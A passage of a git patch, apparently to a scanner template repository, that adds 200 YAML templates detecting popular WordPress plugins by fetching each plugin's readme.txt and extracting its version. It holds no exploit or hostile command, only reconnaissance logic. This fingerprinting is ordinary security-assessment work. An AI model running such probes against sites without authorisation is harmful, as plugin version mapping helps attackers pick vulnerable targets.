.../wordpress/wordpress-wp-migrate-db.yaml | 35 +++++++++++++++++++ .../wordpress-wp-multibyte-patch.yaml | 35 +++++++++++++++++++ .../wordpress/wordpress-wp-optimize.yaml | 35 +++++++++++++++++++ .../wordpress/wordpress-wp-pagenavi.yaml | 35 +++++++++++++++++++ .../wordpress/wordpress-wp-reset.yaml | 35 +++++++++++++++++++ .../wordpress/wordpress-wp-sitemap-page.yaml | 35 +++++++++++++++++++ .../wordpress/wordpress-wp-smushit.yaml | 35 +++++++++++++++++++ .../wordpress/wordpress-wp-statistics.yaml | 35 +++++++++++++++++++ .../wordpress/wordpress-wp-super-cache.yaml | 35 +++++++++++++++++++ .../wordpress/wordpress-wp-user-avatar.yaml | 35 +++++++++++++++++++ .../wordpress/wordpress-wpcf7-recaptcha.yaml | 35 +++++++++++++++++++ .../wordpress/wordpress-wpcf7-redirect.yaml | 35 +++++++++++++++++++ .../wordpress/wordpress-wpforms-lite.yaml | 35 +++++++++++++++++++ .../wordpress/wordpress-wps-hide-login.yaml | 35 +++++++++++++++++++ .../wordpress-yith-woocommerce-compare.yaml | 35 +++++++++++++++++++ .../wordpress-yith-woocommerce-wishlist.yaml | 35 +++++++++++++++++++ 200 files changed, 6999 insertions(+) create mode 100644 technologies/wordpress/wordpress-ad-inserter.yaml create mode 100644 technologies/wordpress/wordpress-add-to-any.yaml create mode 100644 technologies/wordpress/wordpress-admin-menu-editor.yaml create mode 100644 technologies/wordpress/wordpress-adminimize.yaml create mode 100644 technologies/wordpress/wordpress-advanced-custom-fields.yaml create mode 100644 technologies/wordpress/wordpress-akismet.yaml create mode 100644 technologies/wordpress/wordpress-all-404-redirect-to-homepage.yaml create mode 100644 technologies/wordpress/wordpress-all-in-one-seo-pack.yaml create mode 100644 technologies/wordpress/wordpress-all-in-one-wp-migration.yaml create mode 100644 technologies/wordpress/wordpress-all-in-one-wp-security-and-firewall.yaml create mode 100644 technologies/wordpress/wordpress-amp.yaml create mode 100644 technologies/wordpress/wordpress-antispam-bee.yaml create mode 100644 technologies/wordpress/wordpress-astra-sites.yaml create mode 100644 technologies/wordpress/wordpress-astra-widgets.yaml create mode 100644 technologies/wordpress/wordpress-autoptimize.yaml create mode 100644 technologies/wordpress/wordpress-backwpup.yaml create mode 100644 technologies/wordpress/wordpress-better-search-replace.yaml create mode 100644 technologies/wordpress/wordpress-better-wp-security.yaml create mode 100644 technologies/wordpress/wordpress-black-studio-tinymce-widget.yaml create mode 100644 technologies/wordpress/wordpress-breadcrumb-navxt.yaml create mode 100644 technologies/wordpress/wordpress-broken-link-checker.yaml create mode 100644 technologies/wordpress/wordpress-child-theme-configurator.yaml create mode 100644 technologies/wordpress/wordpress-classic-editor.yaml create mode 100644 technologies/wordpress/wordpress-classic-widgets.yaml create mode 100644 technologies/wordpress/wordpress-click-to-chat-for-whatsapp.yaml create mode 100644 technologies/wordpress/wordpress-cloudflare.yaml create mode 100644 technologies/wordpress/wordpress-cmb2.yaml create mode 100644 technologies/wordpress/wordpress-coblocks.yaml create mode 100644 technologies/wordpress/wordpress-code-snippets.yaml create mode 100644 technologies/wordpress/wordpress-coming-soon.yaml create mode 100644 technologies/wordpress/wordpress-complianz-gdpr.yaml create mode 100644 technologies/wordpress/wordpress-contact-form-7-honeypot.yaml create mode 100644 technologies/wordpress/wordpress-contact-form-7.yaml create mode 100644 technologies/wordpress/wordpress-contact-form-cfdb7.yaml create mode 100644 technologies/wordpress/wordpress-cookie-law-info.yaml create mode 100644 technologies/wordpress/wordpress-cookie-notice.yaml create mode 100644 technologies/wordpress/wordpress-creame-whatsapp-me.yaml create mode 100644 technologies/wordpress/wordpress-creative-mail-by-constant-contact.yaml create mode 100644 technologies/wordpress/wordpress-custom-css-js.yaml create mode 100644 technologies/wordpress/wordpress-custom-fonts.yaml create mode 100644 technologies/wordpress/wordpress-custom-post-type-ui.yaml create mode 100644 technologies/wordpress/wordpress-disable-comments.yaml create mode 100644 technologies/wordpress/wordpress-disable-gutenberg.yaml create mode 100644 technologies/wordpress/wordpress-duplicate-page.yaml create mode 100644 technologies/wordpress/wordpress-duplicate-post.yaml create mode 100644 technologies/wordpress/wordpress-duplicator.yaml create mode 100644 technologies/wordpress/wordpress-duracelltomi-google-tag-manager.yaml create mode 100644 technologies/wordpress/wordpress-easy-fancybox.yaml create mode 100644 technologies/wordpress/wordpress-easy-google-fonts.yaml create mode 100644 technologies/wordpress/wordpress-easy-table-of-contents.yaml create mode 100644 technologies/wordpress/wordpress-easy-wp-smtp.yaml create mode 100644 technologies/wordpress/wordpress-elementor.yaml create mode 100644 technologies/wordpress/wordpress-elementskit-lite.yaml create mode 100644 technologies/wordpress/wordpress-enable-media-replace.yaml create mode 100644 technologies/wordpress/wordpress-envato-elements.yaml create mode 100644 technologies/wordpress/wordpress-essential-addons-for-elementor-lite.yaml create mode 100644 technologies/wordpress/wordpress-ewww-image-optimizer.yaml create mode 100644 technologies/wordpress/wordpress-facebook-for-woocommerce.yaml create mode 100644 technologies/wordpress/wordpress-favicon-by-realfavicongenerator.yaml create mode 100644 technologies/wordpress/wordpress-flamingo.yaml create mode 100644 technologies/wordpress/wordpress-fluentform.yaml create mode 100644 technologies/wordpress/wordpress-font-awesome.yaml create mode 100644 technologies/wordpress/wordpress-force-regenerate-thumbnails.yaml create mode 100644 technologies/wordpress/wordpress-formidable.yaml create mode 100644 technologies/wordpress/wordpress-forminator.yaml create mode 100644 technologies/wordpress/wordpress-ga-google-analytics.yaml create mode 100644 technologies/wordpress/wordpress-google-analytics-dashboard-for-wp.yaml create mode 100644 technologies/wordpress/wordpress-google-analytics-for-wordpress.yaml create mode 100644 technologies/wordpress/wordpress-google-listings-and-ads.yaml create mode 100644 technologies/wordpress/wordpress-google-site-kit.yaml create mode 100644 technologies/wordpress/wordpress-google-sitemap-generator.yaml create mode 100644 technologies/wordpress/wordpress-gtranslate.yaml create mode 100644 technologies/wordpress/wordpress-gutenberg.yaml create mode 100644 technologies/wordpress/wordpress-happy-elementor-addons.yaml create mode 100644 technologies/wordpress/wordpress-header-and-footer-scripts.yaml create mode 100644 technologies/wordpress/wordpress-header-footer-code-manager.yaml create mode 100644 technologies/wordpress/wordpress-header-footer-elementor.yaml create mode 100644 technologies/wordpress/wordpress-header-footer.yaml create mode 100644 technologies/wordpress/wordpress-health-check.yaml create mode 100644 technologies/wordpress/wordpress-hello-dolly.yaml create mode 100644 technologies/wordpress/wordpress-imagify.yaml create mode 100644 technologies/wordpress/wordpress-imsanity.yaml create mode 100644 technologies/wordpress/wordpress-insert-headers-and-footers.yaml create mode 100644 technologies/wordpress/wordpress-instagram-feed.yaml create mode 100644 technologies/wordpress/wordpress-intuitive-custom-post-order.yaml create mode 100644 technologies/wordpress/wordpress-iwp-client.yaml create mode 100644 technologies/wordpress/wordpress-jetpack.yaml create mode 100644 technologies/wordpress/wordpress-kadence-blocks.yaml create mode 100644 technologies/wordpress/wordpress-kirki.yaml create mode 100644 technologies/wordpress/wordpress-leadin.yaml create mode 100644 technologies/wordpress/wordpress-limit-login-attempts-reloaded.yaml create mode 100644 technologies/wordpress/wordpress-limit-login-attempts.yaml create mode 100644 technologies/wordpress/wordpress-litespeed-cache.yaml create mode 100644 technologies/wordpress/wordpress-loco-translate.yaml create mode 100644 technologies/wordpress/wordpress-loginizer.yaml create mode 100644 technologies/wordpress/wordpress-loginpress.yaml create mode 100644 technologies/wordpress/wordpress-mailchimp-for-woocommerce.yaml create mode 100644 technologies/wordpress/wordpress-mailchimp-for-wp.yaml create mode 100644 technologies/wordpress/wordpress-mailpoet.yaml create mode 100644 technologies/wordpress/wordpress-maintenance.yaml create mode 100644 technologies/wordpress/wordpress-mainwp-child.yaml create mode 100644 technologies/wordpress/wordpress-malcare-security.yaml create mode 100644 technologies/wordpress/wordpress-megamenu.yaml create mode 100644 technologies/wordpress/wordpress-members.yaml create mode 100644 technologies/wordpress/wordpress-meta-box.yaml create mode 100644 technologies/wordpress/wordpress-ml-slider.yaml create mode 100644 technologies/wordpress/wordpress-newsletter.yaml create mode 100644 technologies/wordpress/wordpress-nextend-facebook-connect.yaml create mode 100644 technologies/wordpress/wordpress-nextgen-gallery.yaml create mode 100644 technologies/wordpress/wordpress-ninja-forms.yaml create mode 100644 technologies/wordpress/wordpress-ocean-extra.yaml create mode 100644 technologies/wordpress/wordpress-official-facebook-pixel.yaml create mode 100644 technologies/wordpress/wordpress-one-click-demo-import.yaml create mode 100644 technologies/wordpress/wordpress-optinmonster.yaml create mode 100644 technologies/wordpress/wordpress-password-protected.yaml create mode 100644 technologies/wordpress/wordpress-pdf-embedder.yaml create mode 100644 technologies/wordpress/wordpress-photo-gallery.yaml create mode 100644 technologies/wordpress/wordpress-php-compatibility-checker.yaml create mode 100644 technologies/wordpress/wordpress-pixelyoursite.yaml create mode 100644 technologies/wordpress/wordpress-polylang.yaml create mode 100644 technologies/wordpress/wordpress-popup-builder.yaml create mode 100644 technologies/wordpress/wordpress-popup-maker.yaml create mode 100644 technologies/wordpress/wordpress-post-duplicator.yaml create mode 100644 technologies/wordpress/wordpress-post-smtp.yaml create mode 100644 technologies/wordpress/wordpress-post-types-order.yaml create mode 100644 technologies/wordpress/wordpress-premium-addons-for-elementor.yaml create mode 100644 technologies/wordpress/wordpress-pretty-link.yaml create mode 100644 technologies/wordpress/wordpress-really-simple-captcha.yaml create mode 100644 technologies/wordpress/wordpress-really-simple-ssl.yaml create mode 100644 technologies/wordpress/wordpress-redirection.yaml create mode 100644 technologies/wordpress/wordpress-redux-framework.yaml create mode 100644 technologies/wordpress/wordpress-regenerate-thumbnails.yaml create mode 100644 technologies/wordpress/wordpress-safe-svg.yaml create mode 100644 technologies/wordpress/wordpress-seo-by-rank-math.yaml create mode 100644 technologies/wordpress/wordpress-sg-cachepress.yaml create mode 100644 technologies/wordpress/wordpress-sg-security.yaml create mode 100644 technologies/wordpress/wordpress-shortcodes-ultimate.yaml create mode 100644 technologies/wordpress/wordpress-shortpixel-image-optimiser.yaml create mode 100644 technologies/wordpress/wordpress-simple-custom-post-order.yaml create mode 100644 technologies/wordpress/wordpress-simple-page-ordering.yaml create mode 100644 technologies/wordpress/wordpress-siteguard.yaml create mode 100644 technologies/wordpress/wordpress-siteorigin-panels.yaml create mode 100644 technologies/wordpress/wordpress-smart-slider-3.yaml create mode 100644 technologies/wordpress/wordpress-so-widgets-bundle.yaml create mode 100644 technologies/wordpress/wordpress-ssl-insecure-content-fixer.yaml create mode 100644 technologies/wordpress/wordpress-stops-core-theme-and-plugin-updates.yaml create mode 100644 technologies/wordpress/wordpress-sucuri-scanner.yaml create mode 100644 technologies/wordpress/wordpress-svg-support.yaml create mode 100644 technologies/wordpress/wordpress-table-of-contents-plus.yaml create mode 100644 technologies/wordpress/wordpress-tablepress.yaml create mode 100644 technologies/wordpress/wordpress-taxonomy-terms-order.yaml create mode 100644 technologies/wordpress/wordpress-the-events-calendar.yaml create mode 100644 technologies/wordpress/wordpress-themeisle-companion.yaml create mode 100644 technologies/wordpress/wordpress-tinymce-advanced.yaml create mode 100644 technologies/wordpress/wordpress-translatepress-multilingual.yaml create mode 100644 technologies/wordpress/wordpress-ultimate-addons-for-gutenberg.yaml create mode 100644 technologies/wordpress/wordpress-under-construction-page.yaml create mode 100644 technologies/wordpress/wordpress-unyson.yaml create mode 100644 technologies/wordpress/wordpress-updraftplus.yaml create mode 100644 technologies/wordpress/wordpress-use-any-font.yaml create mode 100644 technologies/wordpress/wordpress-user-role-editor.yaml create mode 100644 technologies/wordpress/wordpress-velvet-blues-update-urls.yaml create mode 100644 technologies/wordpress/wordpress-w3-total-cache.yaml create mode 100644 technologies/wordpress/wordpress-widget-importer-exporter.yaml create mode 100644 technologies/wordpress/wordpress-woo-cart-abandonment-recovery.yaml create mode 100644 technologies/wordpress/wordpress-woo-checkout-field-editor-pro.yaml create mode 100644 technologies/wordpress/wordpress-woo-variation-swatches.yaml create mode 100644 technologies/wordpress/wordpress-woocommerce-gateway-paypal-express-checkout.yaml create mode 100644 technologies/wordpress/wordpress-woocommerce-gateway-stripe.yaml create mode 100644 technologies/wordpress/wordpress-woocommerce-payments.yaml create mode 100644 technologies/wordpress/wordpress-woocommerce-paypal-payments.yaml create mode 100644 technologies/wordpress/wordpress-woocommerce-pdf-invoices-packing-slips.yaml create mode 100644 technologies/wordpress/wordpress-woocommerce-services.yaml create mode 100644 technologies/wordpress/wordpress-woocommerce.yaml create mode 100644 technologies/wordpress/wordpress-woosidebars.yaml create mode 100644 technologies/wordpress/wordpress-wordfence.yaml create mode 100644 technologies/wordpress/wordpress-wordpress-importer.yaml create mode 100644 technologies/wordpress/wordpress-wordpress-seo.yaml create mode 100644 technologies/wordpress/wordpress-worker.yaml create mode 100644 technologies/wordpress/wordpress-wp-fastest-cache.yaml create mode 100644 technologies/wordpress/wordpress-wp-file-manager.yaml create mode 100644 technologies/wordpress/wordpress-wp-google-maps.yaml create mode 100644 technologies/wordpress/wordpress-wp-mail-smtp.yaml create mode 100644 technologies/wordpress/wordpress-wp-maintenance-mode.yaml create mode 100644 technologies/wordpress/wordpress-wp-migrate-db.yaml create mode 100644 technologies/wordpress/wordpress-wp-multibyte-patch.yaml create mode 100644 technologies/wordpress/wordpress-wp-optimize.yaml create mode 100644 technologies/wordpress/wordpress-wp-pagenavi.yaml create mode 100644 technologies/wordpress/wordpress-wp-reset.yaml create mode 100644 technologies/wordpress/wordpress-wp-sitemap-page.yaml create mode 100644 technologies/wordpress/wordpress-wp-smushit.yaml create mode 100644 technologies/wordpress/wordpress-wp-statistics.yaml create mode 100644 technologies/wordpress/wordpress-wp-super-cache.yaml create mode 100644 technologies/wordpress/wordpress-wp-user-avatar.yaml create mode 100644 technologies/wordpress/wordpress-wpcf7-recaptcha.yaml create mode 100644 technologies/wordpress/wordpress-wpcf7-redirect.yaml create mode 100644 technologies/wordpress/wordpress-wpforms-lite.yaml create mode 100644 technologies/wordpress/wordpress-wps-hide-login.yaml create mode 100644 technologies/wordpress/wordpress-yith-woocommerce-compare.yaml create mode 100644 technologies/wordpress/wordpress-yith-woocommerce-wishlist.yaml diff --git a/technologies/wordpress/wordpress-ad-inserter.yaml b/technologies/wordpress/wordpress-ad-inserter.yaml new file mode 100644 index 0000000000..877393e0ed --- /dev/null +++ b/technologies/wordpress/wordpress-ad-inserter.yaml @@ -0,0 +1,35 @@ + +id: wordpress-ad-inserter + +info: + name: Ad Inserter – Ad Manager & AdSense Ads Detection + author: ricardomaia + severity: info + reference: + - https://wordpress.org/plugins/ad-inserter/ + metadata: + plugin_namespace: ad-inserter + wpscan: https://wpscan.com/plugin/ad-inserter + tags: tech,wordpress,plugin,top-200 + +requests: + - method: GET + redirects: true + max-redirects: 2 + path: + - "{{BaseURL}}/wp-content/plugins/ad-inserter/readme.txt" + matchers-condition: and + matchers: + - type: regex + regex: + - '(?i)Stable.Tag' + - type: status + status: + - 200 + extractors: + - type: regex + name: version + part: body + group: 1 + regex: + - '(?i)Stable.tag:\s?([\w.]+)' diff --git a/technologies/wordpress/wordpress-add-to-any.yaml b/technologies/wordpress/wordpress-add-to-any.yaml new file mode 100644 index 0000000000..1042e69934 --- /dev/null +++ b/technologies/wordpress/wordpress-add-to-any.yaml @@ -0,0 +1,35 @@ + +id: wordpress-add-to-any + +info: + name: AddToAny Share Buttons Detection + author: ricardomaia + severity: info + reference: + - https://wordpress.org/plugins/add-to-any/ + metadata: + plugin_namespace: add-to-any + wpscan: https://wpscan.com/plugin/add-to-any + tags: tech,wordpress,plugin,top-200 + +requests: + - method: GET + redirects: true + max-redirects: 2 + path: + - "{{BaseURL}}/wp-content/plugins/add-to-any/readme.txt" + matchers-condition: and + matchers: + - type: regex + regex: + - '(?i)Stable.Tag' + - type: status + status: + - 200 + extractors: + - type: regex + name: version + part: body + group: 1 + regex: + - '(?i)Stable.tag:\s?([\w.]+)' diff --git a/technologies/wordpress/wordpress-admin-menu-editor.yaml b/technologies/wordpress/wordpress-admin-menu-editor.yaml new file mode 100644 index 0000000000..9914dc1390 --- /dev/null +++ b/technologies/wordpress/wordpress-admin-menu-editor.yaml @@ -0,0 +1,35 @@ + +id: wordpress-admin-menu-editor + +info: + name: Admin Menu Editor Detection + author: ricardomaia + severity: info + reference: + - https://wordpress.org/plugins/admin-menu-editor/ + metadata: + plugin_namespace: admin-menu-editor + wpscan: https://wpscan.com/plugin/admin-menu-editor + tags: tech,wordpress,plugin,top-200 + +requests: + - method: GET + redirects: true + max-redirects: 2 + path: + - "{{BaseURL}}/wp-content/plugins/admin-menu-editor/readme.txt" + matchers-condition: and + matchers: + - type: regex + regex: + - '(?i)Stable.Tag' + - type: status + status: + - 200 + extractors: + - type: regex + name: version + part: body + group: 1 + regex: + - '(?i)Stable.tag:\s?([\w.]+)' diff --git a/technologies/wordpress/wordpress-adminimize.yaml b/technologies/wordpress/wordpress-adminimize.yaml new file mode 100644 index 0000000000..3c101dd403 --- /dev/null +++ b/technologies/wordpress/wordpress-adminimize.yaml @@ -0,0 +1,35 @@ + +id: wordpress-adminimize + +info: + name: Adminimize Detection + author: ricardomaia + severity: info + reference: + - https://wordpress.org/plugins/adminimize/ + metadata: + plugin_namespace: adminimize + wpscan: https://wpscan.com/plugin/adminimize + tags: tech,wordpress,plugin,top-200 + +requests: + - method: GET + redirects: true + max-redirects: 2 + path: + - "{{BaseURL}}/wp-content/plugins/adminimize/readme.txt" + matchers-condition: and + matchers: + - type: regex + regex: + - '(?i)Stable.Tag' + - type: status + status: + - 200 + extractors: + - type: regex + name: version + part: body + group: 1 + regex: + - '(?i)Stable.tag:\s?([\w.]+)' diff --git a/technologies/wordpress/wordpress-advanced-custom-fields.yaml b/technologies/wordpress/wordpress-advanced-custom-fields.yaml new file mode 100644 index 0000000000..51252eae9d --- /dev/null +++ b/technologies/wordpress/wordpress-advanced-custom-fields.yaml @@ -0,0 +1,35 @@ + +id: wordpress-advanced-custom-fields + +info: + name: Advanced Custom Fields Detection + author: ricardomaia + severity: info + reference: + - https://wordpress.org/plugins/advanced-custom-fields/ + metadata: + plugin_namespace: advanced-custom-fields + wpscan: https://wpscan.com/plugin/advanced-custom-fields + tags: tech,wordpress,plugin,top-100 + +requests: + - method: GET + redirects: true + max-redirects: 2 + path: + - "{{BaseURL}}/wp-content/plugins/advanced-custom-fields/readme.txt" + matchers-condition: and + matchers: + - type: regex + regex: + - '(?i)Stable.Tag' + - type: status + status: + - 200 + extractors: + - type: regex + name: version + part: body + group: 1 + regex: + - '(?i)Stable.tag:\s?([\w.]+)' diff --git a/technologies/wordpress/wordpress-akismet.yaml b/technologies/wordpress/wordpress-akismet.yaml new file mode 100644 index 0000000000..e6005864c7 --- /dev/null +++ b/technologies/wordpress/wordpress-akismet.yaml @@ -0,0 +1,35 @@ + +id: wordpress-akismet + +info: + name: Akismet Spam Protection Detection + author: ricardomaia + severity: info + reference: + - https://wordpress.org/plugins/akismet/ + metadata: + plugin_namespace: akismet + wpscan: https://wpscan.com/plugin/akismet + tags: tech,wordpress,plugin,top-100 + +requests: + - method: GET + redirects: true + max-redirects: 2 + path: + - "{{BaseURL}}/wp-content/plugins/akismet/readme.txt" + matchers-condition: and + matchers: + - type: regex + regex: + - '(?i)Stable.Tag' + - type: status + status: + - 200 + extractors: + - type: regex + name: version + part: body + group: 1 + regex: + - '(?i)Stable.tag:\s?([\w.]+)' diff --git a/technologies/wordpress/wordpress-all-404-redirect-to-homepage.yaml b/technologies/wordpress/wordpress-all-404-redirect-to-homepage.yaml new file mode 100644 index 0000000000..864216c1e4 --- /dev/null +++ b/technologies/wordpress/wordpress-all-404-redirect-to-homepage.yaml @@ -0,0 +1,35 @@ + +id: wordpress-all-404-redirect-to-homepage + +info: + name: All 404 Redirect to Homepage & Broken images Redirection Detection + author: ricardomaia + severity: info + reference: + - https://wordpress.org/plugins/all-404-redirect-to-homepage/ + metadata: + plugin_namespace: all-404-redirect-to-homepage + wpscan: https://wpscan.com/plugin/all-404-redirect-to-homepage + tags: tech,wordpress,plugin,top-200 + +requests: + - method: GET + redirects: true + max-redirects: 2 + path: + - "{{BaseURL}}/wp-content/plugins/all-404-redirect-to-homepage/readme.txt" + matchers-condition: and + matchers: + - type: regex + regex: + - '(?i)Stable.Tag' + - type: status + status: + - 200 + extractors: + - type: regex + name: version + part: body + group: 1 + regex: + - '(?i)Stable.tag:\s?([\w.]+)' diff --git a/technologies/wordpress/wordpress-all-in-one-seo-pack.yaml b/technologies/wordpress/wordpress-all-in-one-seo-pack.yaml new file mode 100644 index 0000000000..2c9255bead --- /dev/null +++ b/technologies/wordpress/wordpress-all-in-one-seo-pack.yaml @@ -0,0 +1,35 @@ + +id: wordpress-all-in-one-seo-pack + +info: + name: All in One SEO – Best WordPress SEO Plugin – Easily Improve SEO Rankings & Increase Traffic Detection + author: ricardomaia + severity: info + reference: + - https://wordpress.org/plugins/all-in-one-seo-pack/ + metadata: + plugin_namespace: all-in-one-seo-pack + wpscan: https://wpscan.com/plugin/all-in-one-seo-pack + tags: tech,wordpress,plugin,top-100 + +requests: + - method: GET + redirects: true + max-redirects: 2 + path: + - "{{BaseURL}}/wp-content/plugins/all-in-one-seo-pack/readme.txt" + matchers-condition: and + matchers: + - type: regex + regex: + - '(?i)Stable.Tag' + - type: status + status: + - 200 + extractors: + - type: regex + name: version + part: body + group: 1 + regex: + - '(?i)Stable.tag:\s?([\w.]+)' diff --git a/technologies/wordpress/wordpress-all-in-one-wp-migration.yaml b/technologies/wordpress/wordpress-all-in-one-wp-migration.yaml new file mode 100644 index 0000000000..14dcca2448 --- /dev/null +++ b/technologies/wordpress/wordpress-all-in-one-wp-migration.yaml @@ -0,0 +1,35 @@ + +id: wordpress-all-in-one-wp-migration + +info: + name: All-in-One WP Migration Detection + author: ricardomaia + severity: info + reference: + - https://wordpress.org/plugins/all-in-one-wp-migration/ + metadata: + plugin_namespace: all-in-one-wp-migration + wpscan: https://wpscan.com/plugin/all-in-one-wp-migration + tags: tech,wordpress,plugin,top-100 + +requests: + - method: GET + redirects: true + max-redirects: 2 + path: + - "{{BaseURL}}/wp-content/plugins/all-in-one-wp-migration/readme.txt" + matchers-condition: and + matchers: + - type: regex + regex: + - '(?i)Stable.Tag' + - type: status + status: + - 200 + extractors: + - type: regex + name: version + part: body + group: 1 + regex: + - '(?i)Stable.tag:\s?([\w.]+)' diff --git a/technologies/wordpress/wordpress-all-in-one-wp-security-and-firewall.yaml b/technologies/wordpress/wordpress-all-in-one-wp-security-and-firewall.yaml new file mode 100644 index 0000000000..e531e40ec3 --- /dev/null +++ b/technologies/wordpress/wordpress-all-in-one-wp-security-and-firewall.yaml @@ -0,0 +1,35 @@ + +id: wordpress-all-in-one-wp-security-and-firewall + +info: + name: All-In-One Security (AIOS) – Security and Firewall Detection + author: ricardomaia + severity: info + reference: + - https://wordpress.org/plugins/all-in-one-wp-security-and-firewall/ + metadata: + plugin_namespace: all-in-one-wp-security-and-firewall + wpscan: https://wpscan.com/plugin/all-in-one-wp-security-and-firewall + tags: tech,wordpress,plugin,top-100 + +requests: + - method: GET + redirects: true + max-redirects: 2 + path: + - "{{BaseURL}}/wp-content/plugins/all-in-one-wp-security-and-firewall/readme.txt" + matchers-condition: and + matchers: + - type: regex + regex: + - '(?i)Stable.Tag' + - type: status + status: + - 200 + extractors: + - type: regex + name: version + part: body + group: 1 + regex: + - '(?i)Stable.tag:\s?([\w.]+)' diff --git a/technologies/wordpress/wordpress-amp.yaml b/technologies/wordpress/wordpress-amp.yaml new file mode 100644 index 0000000000..54691efa17 --- /dev/null +++ b/technologies/wordpress/wordpress-amp.yaml @@ -0,0 +1,35 @@ + +id: wordpress-amp + +info: + name: AMP Detection + author: ricardomaia + severity: info + reference: + - https://wordpress.org/plugins/amp/ + metadata: + plugin_namespace: amp + wpscan: https://wpscan.com/plugin/amp + tags: tech,wordpress,plugin,top-200 + +requests: + - method: GET + redirects: true + max-redirects: 2 + path: + - "{{BaseURL}}/wp-content/plugins/amp/readme.txt" + matchers-condition: and + matchers: + - type: regex + regex: + - '(?i)Stable.Tag' + - type: status + status: + - 200 + extractors: + - type: regex + name: version + part: body + group: 1 + regex: + - '(?i)Stable.tag:\s?([\w.]+)' diff --git a/technologies/wordpress/wordpress-antispam-bee.yaml b/technologies/wordpress/wordpress-antispam-bee.yaml new file mode 100644 index 0000000000..ac8fe4b24b --- /dev/null +++ b/technologies/wordpress/wordpress-antispam-bee.yaml @@ -0,0 +1,35 @@ + +id: wordpress-antispam-bee + +info: + name: Antispam Bee Detection + author: ricardomaia + severity: info + reference: + - https://wordpress.org/plugins/antispam-bee/ + metadata: + plugin_namespace: antispam-bee + wpscan: https://wpscan.com/plugin/antispam-bee + tags: tech,wordpress,plugin,top-100 + +requests: + - method: GET + redirects: true + max-redirects: 2 + path: + - "{{BaseURL}}/wp-content/plugins/antispam-bee/readme.txt" + matchers-condition: and + matchers: + - type: regex + regex: + - '(?i)Stable.Tag' + - type: status + status: + - 200 + extractors: + - type: regex + name: version + part: body + group: 1 + regex: + - '(?i)Stable.tag:\s?([\w.]+)' diff --git a/technologies/wordpress/wordpress-astra-sites.yaml b/technologies/wordpress/wordpress-astra-sites.yaml new file mode 100644 index 0000000000..5ae51394f5 --- /dev/null +++ b/technologies/wordpress/wordpress-astra-sites.yaml @@ -0,0 +1,35 @@ + +id: wordpress-astra-sites + +info: + name: Starter Templates — Elementor, WordPress & Beaver Builder Templates Detection + author: ricardomaia + severity: info + reference: + - https://wordpress.org/plugins/astra-sites/ + metadata: + plugin_namespace: astra-sites + wpscan: https://wpscan.com/plugin/astra-sites + tags: tech,wordpress,plugin,top-100 + +requests: + - method: GET + redirects: true + max-redirects: 2 + path: + - "{{BaseURL}}/wp-content/plugins/astra-sites/readme.txt" + matchers-condition: and + matchers: + - type: regex + regex: + - '(?i)Stable.Tag' + - type: status + status: + - 200 + extractors: + - type: regex + name: version + part: body + group: 1 + regex: + - '(?i)Stable.tag:\s?([\w.]+)' diff --git a/technologies/wordpress/wordpress-astra-widgets.yaml b/technologies/wordpress/wordpress-astra-widgets.yaml new file mode 100644 index 0000000000..29488dcd22 --- /dev/null +++ b/technologies/wordpress/wordpress-astra-widgets.yaml @@ -0,0 +1,35 @@ + +id: wordpress-astra-widgets + +info: + name: Astra Widgets Detection + author: ricardomaia + severity: info + reference: + - https://wordpress.org/plugins/astra-widgets/ + metadata: + plugin_namespace: astra-widgets + wpscan: https://wpscan.com/plugin/astra-widgets + tags: tech,wordpress,plugin,top-200 + +requests: + - method: GET + redirects: true + max-redirects: 2 + path: + - "{{BaseURL}}/wp-content/plugins/astra-widgets/readme.txt" + matchers-condition: and + matchers: + - type: regex + regex: + - '(?i)Stable.Tag' + - type: status + status: + - 200 + extractors: + - type: regex + name: version + part: body + group: 1 + regex: + - '(?i)Stable.tag:\s?([\w.]+)' diff --git a/technologies/wordpress/wordpress-autoptimize.yaml b/technologies/wordpress/wordpress-autoptimize.yaml new file mode 100644 index 0000000000..6ff6aacff9 --- /dev/null +++ b/technologies/wordpress/wordpress-autoptimize.yaml @@ -0,0 +1,35 @@ + +id: wordpress-autoptimize + +info: + name: Autoptimize Detection + author: ricardomaia + severity: info + reference: + - https://wordpress.org/plugins/autoptimize/ + metadata: + plugin_namespace: autoptimize + wpscan: https://wpscan.com/plugin/autoptimize + tags: tech,wordpress,plugin,top-100 + +requests: + - method: GET + redirects: true + max-redirects: 2 + path: + - "{{BaseURL}}/wp-content/plugins/autoptimize/readme.txt" + matchers-condition: and + matchers: + - type: regex + regex: + - '(?i)Stable.Tag' + - type: status + status: + - 200 + extractors: + - type: regex + name: version + part: body + group: 1 + regex: + - '(?i)Stable.tag:\s?([\w.]+)' diff --git a/technologies/wordpress/wordpress-backwpup.yaml b/technologies/wordpress/wordpress-backwpup.yaml new file mode 100644 index 0000000000..23577ab564 --- /dev/null +++ b/technologies/wordpress/wordpress-backwpup.yaml @@ -0,0 +1,35 @@ + +id: wordpress-backwpup + +info: + name: BackWPup – WordPress Backup Plugin Detection + author: ricardomaia + severity: info + reference: + - https://wordpress.org/plugins/backwpup/ + metadata: + plugin_namespace: backwpup + wpscan: https://wpscan.com/plugin/backwpup + tags: tech,wordpress,plugin,top-100 + +requests: + - method: GET + redirects: true + max-redirects: 2 + path: + - "{{BaseURL}}/wp-content/plugins/backwpup/readme.txt" + matchers-condition: and + matchers: + - type: regex + regex: + - '(?i)Stable.Tag' + - type: status + status: + - 200 + extractors: + - type: regex + name: version + part: body + group: 1 + regex: + - '(?i)Stable.tag:\s?([\w.]+)' diff --git a/technologies/wordpress/wordpress-better-search-replace.yaml b/technologies/wordpress/wordpress-better-search-replace.yaml new file mode 100644 index 0000000000..ed77f66422 --- /dev/null +++ b/technologies/wordpress/wordpress-better-search-replace.yaml @@ -0,0 +1,35 @@ + +id: wordpress-better-search-replace + +info: + name: Better Search Replace Detection + author: ricardomaia + severity: info + reference: + - https://wordpress.org/plugins/better-search-replace/ + metadata: + plugin_namespace: better-search-replace + wpscan: https://wpscan.com/plugin/better-search-replace + tags: tech,wordpress,plugin,top-100 + +requests: + - method: GET + redirects: true + max-redirects: 2 + path: + - "{{BaseURL}}/wp-content/plugins/better-search-replace/readme.txt" + matchers-condition: and + matchers: + - type: regex + regex: + - '(?i)Stable.Tag' + - type: status + status: + - 200 + extractors: + - type: regex + name: version + part: body + group: 1 + regex: + - '(?i)Stable.tag:\s?([\w.]+)' diff --git a/technologies/wordpress/wordpress-better-wp-security.yaml b/technologies/wordpress/wordpress-better-wp-security.yaml new file mode 100644 index 0000000000..f69474cd60 --- /dev/null +++ b/technologies/wordpress/wordpress-better-wp-security.yaml @@ -0,0 +1,35 @@ + +id: wordpress-better-wp-security + +info: + name: 